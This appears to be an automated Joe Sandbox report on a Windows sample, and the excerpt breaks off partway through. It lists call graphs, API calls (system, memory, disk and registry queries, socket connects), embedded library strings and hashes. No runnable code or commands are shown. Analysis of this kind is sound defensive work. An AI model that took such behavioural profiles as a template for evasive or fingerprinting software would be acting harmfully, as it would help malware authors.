68303 319740 68300->68303 68302 31a09b 68304 319780 68303->68304 68308 31975d 68303->68308 68305 319925 RegOpenKeyExA 68304->68305 68304->68308 68306 31995a RegQueryValueExA 68305->68306 68305->68308 68307 319986 RegCloseKey 68306->68307 68307->68308 68308->68302 68309 252f17 68316 252f2c 68309->68316 68310 2531d3 68311 252fb3 RegOpenKeyExA 68311->68316 68312 25315c RegEnumKeyExA 68312->68316 68313 253046 RegOpenKeyExA 68314 253089 RegQueryValueExA 68313->68314 68313->68316 68315 25313b RegCloseKey 68314->68315 68314->68316 68315->68316 68316->68310 68316->68311 68316->68312 68316->68313 68316->68315 68317 2531d7 68320 2531f4 68317->68320 68318 253200 68319 2532dc CloseHandle 68319->68318 68320->68318 68320->68319 68181 2895b0 68182 2895c8 68181->68182 68183 2895fd 68181->68183 68182->68183 68185 28a150 68182->68185 68186 28a15f 68185->68186 68188 28a1d0 68185->68188 68187 28a181 getsockname 68186->68187 68186->68188 68187->68188 68188->68183 68321 288b50 68322 288b6b 68321->68322 68339 288bb5 68321->68339 68323 288b8f 68322->68323 68324 288bf3 68322->68324 68322->68339 68356 266e40 select 68323->68356 68341 28a550 68324->68341 68327 288bfc 68329 288c1f connect 68327->68329 68330 288c35 68327->68330 68337 288cb2 68327->68337 68327->68339 68328 288cd9 SleepEx 68334 288d13 68328->68334 68329->68330 68333 28a150 getsockname 68330->68333 68331 28a150 getsockname 68336 288dff 68331->68336 68340 288ba1 68333->68340 68335 288d43 68334->68335 68334->68337 68338 28a150 getsockname 68335->68338 68336->68339 68357 2578b0 closesocket 68336->68357 68337->68331 68337->68336 68337->68339 68338->68339 68340->68328 68340->68337 68340->68339 68342 28a575 68341->68342 68346 28a597 68342->68346 68359 2575e0 68342->68359 68344 2578b0 closesocket 68345 28a713 68344->68345 68345->68327 68347 28a811 setsockopt 68346->68347 68348 28a69b 68346->68348 68351 28a83b 68346->68351 68347->68351 68348->68344 68348->68345 68350 28af56 68350->68348 68352 28af5d 68350->68352 68351->68348 68355 28abe1 68351->68355 68365 286be0 select closesocket 68351->68365 68352->68345 68353 28a150 getsockname 68352->68353 68353->68345 68355->68348 68364 2b67e0 ioctlsocket 68355->68364 68356->68340 68358 2578c5 68357->68358 68358->68339 68360 257607 socket 68359->68360 68361 2575ef 68359->68361 68362 25762b 68360->68362 68361->68360 68363 257643 68361->68363 68362->68346 68363->68346 68364->68350 68365->68355 68366 25255d 68367 5d9f70 68366->68367 68368 25256c GetSystemInfo 68367->68368 68369 252589 68368->68369 68370 2525a0 GlobalMemoryStatusEx 68369->68370 68375 2525ec 68370->68375 68371 252762 68374 2527d6 KiUserCallbackDispatcher 68371->68374 68372 25263c GetDriveTypeA 68373 252655 GetDiskFreeSpaceExA 68372->68373 68372->68375 68373->68375 68376 2527f8 68374->68376 68375->68371 68375->68372 68377 2528d9 FindFirstFileW 68376->68377 68378 252906 FindNextFileW 68377->68378 68379 252928 68377->68379 68378->68378 68378->68379 68189 2529ff FindFirstFileA 68190 252a31 68189->68190 68191 252a5c RegOpenKeyExA 68190->68191 68192 252a93 68191->68192 68193 252ade CharUpperA 68192->68193 68194 252b0a 68193->68194 68195 252bf9 QueryFullProcessImageNameA 68194->68195 68196 252c3b CloseHandle 68195->68196 68198 252c64 68196->68198 68197 252df1 CloseHandle 68199 252e23 68197->68199 68198->68197 68380 253d5e 68381 253d30 68380->68381 68381->68380 68382 253d90 68381->68382 68386 260ab0 68381->68386 68389 25fcb0 closesocket 68382->68389 68385 253dc1 68390 2605b0 68386->68390 68388 260acd 68388->68381 68389->68385 68391 2607c7 68390->68391 68394 2605bd 68390->68394 68391->68388 68392 260707 WSAEventSelect 68392->68391 68392->68394 68393 2607ef 68393->68391 68398 260847 68393->68398 68400 266fa0 68393->68400 68394->68391 68394->68392 68394->68393 68396 2576a0 send 68394->68396 68396->68394 68397 2609e8 WSAEnumNetworkEvents 68397->68398 68399 2609d0 WSAEventSelect 68397->68399 68398->68391 68398->68397 68398->68399 68399->68397 68399->68398 68401 266fd4 68400->68401 68403 266feb 68400->68403 68402 267207 select 68401->68402 68401->68403 68402->68403 68403->68398 68404 5db160 Sleep 68200 261139 68201 260f00 68200->68201 68202 260f7b 68201->68202 68204 28d4d0 closesocket 68201->68204 68204->68201

                                                          Executed Functions

                                                          Function 0028F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: 97679c901d62fb0e1c99ad722292c35eed1b0cfce3bcba8223c87746a4afdc92
                                                          • Instruction ID: 74341e45ba0ff95af0f8df912996225331a8eb53806fb35ffb23117b129eed7e
                                                          • Opcode Fuzzy Hash: 97679c901d62fb0e1c99ad722292c35eed1b0cfce3bcba8223c87746a4afdc92
                                                          • Instruction Fuzzy Hash: 48C2E235A143459FD724DF29C584B6AB7E1FF88314F04866DEC988B2A2D770EDA4CB81
                                                          Function 0025255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 00252579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 002525CC
                                                          • GetDriveTypeA.KERNELBASE ref: 00252647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0025267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 002527E2
                                                          • FindFirstFileW.KERNELBASE ref: 002528F8
                                                          • FindNextFileW.KERNELBASE ref: 0025291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                          • String ID: ;%%$@$`
                                                          • API String ID: 3271271169-1167538584
                                                          • Opcode ID: ce5ed24d1e4e8f2f94fb7c788ce162924d57deb8d4f135c194a98152320adf70
                                                          • Instruction ID: 73a70d668ff295699178670904808930c96fbab6544a1c218b47b7ffa4107854
                                                          • Opcode Fuzzy Hash: ce5ed24d1e4e8f2f94fb7c788ce162924d57deb8d4f135c194a98152320adf70
                                                          • Instruction Fuzzy Hash: F6D1B5B59147099FCB50EF68C58569EBBF1FF44304F00886EE898D7350E7759A888F92
                                                          Function 002529FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1272 2529ff-252a2f FindFirstFileA 1273 252a31-252a36 1272->1273 1274 252a38 1272->1274 1275 252a3d-252a91 call 6dee90 call 6def20 RegOpenKeyExA 1273->1275 1274->1275 1280 252a93-252a98 1275->1280 1281 252a9a 1275->1281 1282 252a9f-252b0c call 6dee90 call 6def20 CharUpperA call 5d8da0 1280->1282 1281->1282 1290 252b15 1282->1290 1291 252b0e-252b13 1282->1291 1292 252b1a-252b92 call 6dee90 call 6def20 call 5d8e80 call 5d8e70 1290->1292 1291->1292 1301 252b94-252ba3 1292->1301 1302 252bcc-252c66 QueryFullProcessImageNameA CloseHandle call 5d8da0 1292->1302 1305 252ba5-252bae 1301->1305 1306 252bb0-252bca call 5d8e68 1301->1306 1312 252c6f 1302->1312 1313 252c68-252c6d 1302->1313 1305->1302 1306->1301 1306->1302 1314 252c74-252ce9 call 6dee90 call 6def20 call 5d8e80 call 5d8e70 1312->1314 1313->1314 1323 252dcf-252e1c call 6dee90 call 6def20 CloseHandle 1314->1323 1324 252cef-252d49 call 5d8bb0 call 5d8da0 1314->1324 1333 252e23-252e2e 1323->1333 1337 252d99-252dad 1324->1337 1338 252d4b-252d63 call 5d8da0 1324->1338 1335 252e37 1333->1335 1336 252e30-252e35 1333->1336 1340 252e3c-252ed6 call 6dee90 call 6def20 1335->1340 1336->1340 1337->1323 1338->1337 1344 252d65-252d7d call 5d8da0 1338->1344 1354 252ed8-252ee1 1340->1354 1355 252eea 1340->1355 1344->1337 1350 252d7f-252d97 call 5d8da0 1344->1350 1350->1337 1357 252daf-252dc9 call 5d8e68 1350->1357 1354->1355 1358 252ee3-252ee8 1354->1358 1356 252eef-252f16 call 6dee90 call 6def20 1355->1356 1357->1323 1357->1324 1358->1356
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: cce27d5ef578a8cc346f05fa115c5b6138ccee12920a2c242e0f8aeaf7900774
                                                          • Instruction ID: 219ec856998cbfa02c4cfb90031cb846bec00828aa84e4442a1cfb909a58dd73
                                                          • Opcode Fuzzy Hash: cce27d5ef578a8cc346f05fa115c5b6138ccee12920a2c242e0f8aeaf7900774
                                                          • Instruction Fuzzy Hash: D0E1D1B0915305DFCB50EFA8D98569DBBF5EF84304F50886AE988DB390E7749988CF42
                                                          Function 002605B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1512 2605b0-2605b7 1513 2607ee 1512->1513 1514 2605bd-2605d4 1512->1514 1515 2607e7-2607ed 1514->1515 1516 2605da-2605e6 1514->1516 1515->1513 1516->1515 1517 2605ec-2605f0 1516->1517 1518 2605f6-260620 call 267350 call 2570b0 1517->1518 1519 2607c7-2607cc 1517->1519 1524 260622-260624 1518->1524 1525 26066a-26068c call 28dec0 1518->1525 1519->1515 1527 260630-260655 call 2570d0 call 2603c0 call 267450 1524->1527 1530 2607d6-2607e3 call 267380 1525->1530 1531 260692-2606a0 1525->1531 1551 2607ce 1527->1551 1552 26065b-260668 call 2570e0 1527->1552 1530->1515 1535 2606f4-2606f6 1531->1535 1536 2606a2-2606a4 1531->1536 1538 2607ef-26082b call 263000 1535->1538 1539 2606fc-2606fe 1535->1539 1541 2606b0-2606e4 call 2673b0 1536->1541 1555 260831-260837 1538->1555 1556 260a2f-260a35 1538->1556 1543 26072c-260754 1539->1543 1541->1530 1557 2606ea-2606ee 1541->1557 1547 260756-26075b 1543->1547 1548 26075f-26078b 1543->1548 1553 260707-260719 WSAEventSelect 1547->1553 1554 26075d 1547->1554 1569 260700-260703 1548->1569 1570 260791-260796 1548->1570 1551->1530 1552->1525 1552->1527 1553->1530 1562 26071f 1553->1562 1563 260723-260726 1554->1563 1565 260861-26087e 1555->1565 1566 260839-260842 call 266fa0 1555->1566 1559 260a37-260a3a 1556->1559 1560 260a3c-260a52 1556->1560 1557->1541 1558 2606f0 1557->1558 1558->1535 1559->1560 1560->1530 1567 260a58-260a81 call 262f10 1560->1567 1562->1563 1563->1538 1563->1543 1576 260882-26088d 1565->1576 1575 260847-26084c 1566->1575 1567->1530 1585 260a87-260a97 call 266df0 1567->1585 1569->1553 1570->1569 1574 26079c-2607c2 call 2576a0 1570->1574 1574->1569 1579 260852 1575->1579 1580 260a9c-260aa4 1575->1580 1583 260893-2608b1 1576->1583 1584 260970-260975 1576->1584 1579->1565 1582 260854-26085f 1579->1582 1580->1530 1582->1576 1588 2608c8-2608f7 1583->1588 1586 26097b-260989 call 2570b0 1584->1586 1587 260a19-260a2c 1584->1587 1585->1530 1586->1587 1595 26098f-26099e 1586->1595 1587->1556 1596 2608fd-260925 1588->1596 1597 2608f9-2608fb 1588->1597 1598 2609b0-2609c1 call 2570d0 1595->1598 1599 260928-26093f 1596->1599 1597->1599 1603 2609c3-2609c7 1598->1603 1604 2609a0-2609ae call 2570e0 1598->1604 1605 260945-26096b 1599->1605 1606 2608b3-2608c2 1599->1606 1608 2609e8-260a03 WSAEnumNetworkEvents 1603->1608 1604->1587 1604->1598 1605->1606 1606->1584 1606->1588 1610 260a05-260a17 1608->1610 1611 2609d0-2609e6 WSAEventSelect 1608->1611 1610->1611 1611->1604 1611->1608
                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,?,?), ref: 00260711
                                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 002609DD
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002609FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: N=%$multi.c
                                                          • API String ID: 2170980988-1447425148
                                                          • Opcode ID: 190f80d42bddbb79b32dbd048727d871eee93d6ed2beddf4b807fdc6f831d3f9
                                                          • Instruction ID: 686b63f3966bf3a94a9d2c80c80c0e276b117962b82c09c2a91ead7cbd145ad3
                                                          • Opcode Fuzzy Hash: 190f80d42bddbb79b32dbd048727d871eee93d6ed2beddf4b807fdc6f831d3f9
                                                          • Instruction Fuzzy Hash: 67D1B1716283029FE711CF64C881B6BB7E9FF94344F04482CF98586291E7B4E9A9DB52
                                                          Function 0031B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1683 31b180-31b195 1684 31b3e0-31b3e7 1683->1684 1685 31b19b-31b1a2 1683->1685 1686 31b1b0-31b1b9 1685->1686 1686->1686 1687 31b1bb-31b1bd 1686->1687 1687->1684 1688 31b1c3-31b1d0 1687->1688 1690 31b1d6-31b1f2 1688->1690 1691 31b3db 1688->1691 1692 31b229-31b22d 1690->1692 1691->1684 1693 31b233-31b246 1692->1693 1694 31b3e8-31b417 1692->1694 1695 31b260-31b264 1693->1695 1696 31b248-31b24b 1693->1696 1701 31b582-31b589 1694->1701 1702 31b41d-31b429 1694->1702 1700 31b269-31b286 call 31af30 1695->1700 1697 31b215-31b223 1696->1697 1698 31b24d-31b256 1696->1698 1697->1692 1704 31b315-31b33c call 5d8b00 1697->1704 1698->1700 1711 31b2f0-31b301 1700->1711 1712 31b288-31b2a3 call 31b060 1700->1712 1706 31b435-31b44c call 31b590 1702->1706 1707 31b42b-31b433 call 31b590 1702->1707 1714 31b342-31b347 1704->1714 1715 31b3bf-31b3ca 1704->1715 1722 31b458-31b471 call 31b590 1706->1722 1723 31b44e-31b456 call 31b590 1706->1723 1707->1706 1711->1697 1732 31b307-31b310 1711->1732 1728 31b200-31b213 call 31b020 1712->1728 1729 31b2a9-31b2c7 getsockname call 31b020 1712->1729 1719 31b384-31b38f 1714->1719 1720 31b349-31b358 1714->1720 1724 31b3cc-31b3d9 1715->1724 1719->1715 1727 31b391-31b3a5 1719->1727 1726 31b360-31b382 1720->1726 1741 31b473-31b487 1722->1741 1742 31b48c-31b4a7 1722->1742 1723->1722 1724->1684 1726->1719 1726->1726 1733 31b3b0-31b3bd 1727->1733 1728->1697 1739 31b2cc-31b2dd 1729->1739 1732->1724 1733->1715 1733->1733 1739->1697 1745 31b2e3 1739->1745 1741->1701 1743 31b4b3-31b4cb call 31b660 1742->1743 1744 31b4a9-31b4b1 call 31b660 1742->1744 1750 31b4d9-31b4f5 call 31b660 1743->1750 1751 31b4cd-31b4d5 call 31b660 1743->1751 1744->1743 1745->1732 1756 31b4f7-31b50b 1750->1756 1757 31b50d-31b52b call 31b770 * 2 1750->1757 1751->1750 1756->1701 1757->1701 1762 31b52d-31b531 1757->1762 1763 31b580 1762->1763 1764 31b533-31b53b 1762->1764 1763->1701 1765 31b578-31b57e 1764->1765 1766 31b53d-31b547 1764->1766 1765->1701 1766->1765 1767 31b549-31b54d 1766->1767 1767->1765 1768 31b54f-31b558 1767->1768 1768->1765 1769 31b55a-31b576 call 31b870 * 2 1768->1769 1769->1701 1769->1765
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0031B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-2430778319
                                                          • Opcode ID: cd6e3c4d531404f3572a934f9a8b06922ce25f0b3d214b5a97e1b98b3c88712e
                                                          • Instruction ID: 6a74c0ab8c8a75dd49d99d70d52b34f7cccaceddd38a7af530c01711745b6af0
                                                          • Opcode Fuzzy Hash: cd6e3c4d531404f3572a934f9a8b06922ce25f0b3d214b5a97e1b98b3c88712e
                                                          • Instruction Fuzzy Hash: 31C17E356043059FD719DF24C880AAAB7E2FF8D354F05886DE8998B3A1DB31ED85CB81
                                                          Function 00266FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31d7d4ca425bb99f61889cf4d71ec20e3df4471a05bf300d1e16b0e537b876ba
                                                          • Instruction ID: 0e85d18f256aade9aa5840417b9056dba9644ec373477923ded160838bc88eda
                                                          • Opcode Fuzzy Hash: 31d7d4ca425bb99f61889cf4d71ec20e3df4471a05bf300d1e16b0e537b876ba
                                                          • Instruction Fuzzy Hash: 1D91153062C34A4BD7358E28E8D47BB72D5EFD5328F148B2DE898431D4EB719CE09691
                                                          Function 0031A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0030712E,?,?,?,00001001,00000000), ref: 0031A90D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
